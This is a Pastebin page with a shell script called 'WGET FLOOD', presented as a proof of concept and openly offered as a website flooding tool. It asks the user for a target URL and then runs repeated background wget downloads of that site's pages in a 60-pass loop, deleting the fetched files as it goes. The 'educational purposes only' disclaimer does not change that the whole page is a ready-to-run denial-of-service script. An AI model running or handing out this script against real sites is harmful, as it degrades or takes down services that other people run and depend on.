Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/sh
- # ___________________________________________
- #
- # This is a PoC in wget, anyone in the right mind
- # could have brought this to their attention,
- # so ill be the pround creator of the wget flood concept
- # ___________________________________________
- #
- # wget will need to be installed
- #
- # yum install wget
- #
- # apt-get install wget
- #
- # ___________________________________________
- #
- # Normal execution would be;
- #
- # sh wgetflood.sh
- # ___________________________________________
- #
- # You will then need to input your url you would like to attack.
- # Note: This is for educational purposes only.
- # ___ _ _ _ _____ ___
- # / __|_ _ ___ __| (_) |_ ___ / / _ )_ _ __ _ __|__ \
- # | (__| '_/ -_) _` | | _(_-</ /| _ \ || / _` (_-< /_/
- # \___|_| \___\__,_|_|\__/__/_/ |___/\_,_\__, /__/(_)
- # |___/
- #
- # I'm not responsible for any misuse of this program.
- # All credits goes to Chris Poole | @codingplanets on twitter
- # Please report any bugs via twitter.
- #_____________________________________________________________
- echo """
- /!\ Welcome to WGET FLOOD /!\
- __ _______ ______ _______ ______ _ ____ ____ _____
- \ \ / / ____| ____|__ __| | ____| | / __ \ / __ \| __ \
- \ \ /\ / / | __| |__ | | | |__ | | | | | | | | | | | |
- \ \/ \/ /| | |_ | __| | | | __| | | | | | | | | | | | |
- \ /\ / | |__| | |____ | | | | | |___| |__| | |__| | |__| |
- \/ \/ \_____|______| |_| |_| |______\____/ \____/|_____/
- """
- echo """
- /!\ Please enter target /!\
- """
- echo "root@wgetflood:~# "
- read target
- for i in {1..60}; do echo " __________________________________________"; echo " Attack is starting, Please wait 30 minutes."; echo " /!\ C O D E D B Y Chris Poole | @codingplanets /!\ "; wget $target --page-requisites --limit 300 -q -B -c --delete-after --no-check-certificate --max-redirect 600 --auth-no-challenge --timeout 5 --dns-timeout 2 --wait 5; wget $target --page-requisites --limit 300 -q -B -c --delete-after --no-check-certificate --max-redirect 600 --auth-no-challenge --timeout 5 --dns-timeout 2 --wait 5; wget $target --page-requisites --limit 300 -q -B -c --delete-after --no-check-certificate --max-redirect 600 --auth-no-challenge --timeout 5 --dns-timeout 2 --wait 5; rm -rf *html; rm -rf index*; done
- echo """
- Attack is done. CTRL + C to exit.
- """
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement